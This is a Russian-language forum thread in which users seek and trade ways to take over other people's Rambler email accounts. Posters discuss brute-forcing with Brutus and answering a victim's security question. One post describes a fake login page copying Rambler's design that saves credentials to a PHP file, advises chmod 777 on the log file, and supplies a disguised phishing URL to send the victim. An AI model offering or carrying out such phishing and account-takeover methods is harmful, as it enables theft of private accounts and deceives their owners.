Есть ли вообще какой-нибудь хороший проверенный способ взлома мыла на rambler. Говорят там хорошая заЩИТа! Да брутус не поможет у некоторых пароли вот такие habahabh%^!#! в словаре такого нету(для брутуса)! помогите плиз! З.Ы. Просьба не писать способы с трояном не педагогично!
Вот держи видео по взлому мыльника и скрипты) Видео скрипта для рабмлера маил ру почта ру вообщем грянь на inattack.ru там есчё скрипты лежат)
Насчет контрольных вопросов, они и правда простые, я уже знаю ответ на вопрос своей жертвы Однако, там письмо отправляется "На контактный адрес, который Вы указали ранее, выслано письмо с информацией о том, как задать новый пароль для Вашего имени на Рамблере." Как быть?
Так это и есть фэйковая страница, которая полностью копирует дизайн рамблера а когда пользовтель воодит свой логин и пароль, то он сохраняется в ramblerbase.php, посмотри исходники и увидишь форму, которая все кидает в этот файл
Проверенных способов нет.Надо использовать все.А насчет защиты супер незнаю,парень знакомый брутил майло причем за один день.Как ,сие мне неизвестно.Защита(в плане того,что могут "забанить" при бруте)насколько мне известно только на mail.ru.И педагогично все.Кто не рискует,тот не пъет шампанского.С Уважением Один.
незабудь для того фаила в который логи записываются поставить сhmod 777 а то у тебя писать ни чего не будетю http://rambler.ru:asdsdfkasdhfskdjfksgdfuhglsdfjghlsdjfhglskdjfhglskdjfgh@cheet.ueuo.com/www вот эту ссылку можешь дать. только в Ie она не пашет тот который выше 6 версии Или эту cheet.ueuo.com/www если у нее осел стоит за паролями ко мне в асю 858759. Ей только необходимо набрать в поля логин и пароль.